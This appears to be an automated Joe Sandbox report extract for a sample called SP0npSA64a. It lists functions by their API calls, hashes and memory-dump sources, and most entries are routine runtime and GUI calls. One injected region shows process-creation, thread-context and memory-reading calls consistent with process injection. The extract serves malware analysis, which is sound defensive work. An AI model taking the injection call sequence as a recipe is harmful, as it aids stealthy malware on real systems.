                                                                                  • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                                                  • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                                                                  • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  • Opcode ID: 275534035a012e7ef0db215d78f24564d6aa5c775b6c55b3817692144b07e5e7
                                                                                  • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                                                                  • Opcode Fuzzy Hash: 275534035a012e7ef0db215d78f24564d6aa5c775b6c55b3817692144b07e5e7
                                                                                  • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                                                                  APIs
                                                                                    • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                                                    • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                                                  • _strcat.LIBCMT ref: 0040F786
                                                                                    • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                                                    • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 3199840319-0
                                                                                  • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                  • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                                                  • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                                                  • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                                                  APIs
                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeInfoLibraryParametersSystem
                                                                                  • String ID:
                                                                                  • API String ID: 3403648963-0
                                                                                  • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                  • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                  • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                  • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                  APIs
                                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                  • __lock_file.LIBCMT ref: 00414A8D
                                                                                    • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                                                  • __fclose_nolock.LIBCMT ref: 00414A98
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2800547568-0
                                                                                  • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                  • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                                                  • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                                                  • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                                                  APIs
                                                                                  • __lock_file.LIBCMT ref: 00415012
                                                                                  • __ftell_nolock.LIBCMT ref: 0041501F
                                                                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 2999321469-0
                                                                                  • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                  • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                                                  • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                                                  • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 03FAA375
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03FAA399
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03FAA3BB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2227636278.0000000003FA8000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA8000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_3fa8000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 2438371351-0
                                                                                  • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                                  • Instruction ID: 21c9c444a2f5e5340da62d2d3590150eb2dc187e191ce2fd2b15d18cfb025f5d
                                                                                  • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                                                                                  • Instruction Fuzzy Hash: B912DE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A4F85CF5A
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID:
                                                                                  • API String ID: 4104443479-0
                                                                                  • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                  • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                                                  • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                                                                  • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                  • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                                                  • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                                                  • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                                                  APIs
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • _memmove.LIBCMT ref: 00444B34
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1183979061-0
                                                                                  • Opcode ID: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                                  • Instruction ID: 1ab6fe9f530497837eb86deb75815884a9af672873ccf792f11a5e6f6739e6df
                                                                                  • Opcode Fuzzy Hash: 5456aa698ccb66e472ad2dc6bdf94112e2600af6ff6d776df7a489d92d6f0097
                                                                                  • Instruction Fuzzy Hash: E0016D3220410AAFD714DF2CC882DA7B3EDEF88318711492FE996C7251EA74F9508B94
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __lock_file
                                                                                  • String ID:
                                                                                  • API String ID: 3031932315-0
                                                                                  • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                  • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                                                  • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                                                  • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                                                  APIs
                                                                                    • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                    • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                                                                                    • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                                                                                  • VariantClear.OLEAUT32(?), ref: 0047973E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$Clear$CopyInit
                                                                                  • String ID:
                                                                                  • API String ID: 24293632-0
                                                                                  • Opcode ID: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                                                                  • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                                                                                  • Opcode Fuzzy Hash: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                                                                                  • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wfsopen
                                                                                  • String ID:
                                                                                  • API String ID: 197181222-0
                                                                                  • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                  • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                  • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                  • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 03FAAB59
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2227636278.0000000003FA8000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA8000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_3fa8000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                  • Instruction ID: a216cb06034231572956c29f5551777b84ca4608c71d506a9798a60abaed890d
                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                  • Instruction Fuzzy Hash: 3AE0E67494110DDFDB00DFB8D5496DD7BF4EF04302F1002A1FD01D2280D6709D50CA62
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                  • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                  • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                  • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                  • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                  • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                  • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                  • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                  • SendMessageW.USER32 ref: 0047CA7F
                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                  • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                  • ImageList_SetDragCursorImage.COMCTL32(0096F610,00000000,00000000,00000000), ref: 0047CB9B
                                                                                  • ImageList_BeginDrag.COMCTL32(0096F610,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                  • SetCapture.USER32(?), ref: 0047CBB6
                                                                                  • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                  • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                  • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                  • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                  • SendMessageW.USER32 ref: 0047CD12
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                  • SendMessageW.USER32 ref: 0047CD80
                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                  • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                  • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                  • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                  • SendMessageW.USER32 ref: 0047CE93
                                                                                  • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,03071BE8,00000000,?,?,?,?), ref: 0047CF1C
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                  • SendMessageW.USER32 ref: 0047CF6B
                                                                                  • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,03071BE8,00000000,?,?,?,?), ref: 0047CFE6
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                  • String ID: @GUI_DRAGID$F
                                                                                  • API String ID: 3100379633-4164748364
                                                                                  • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
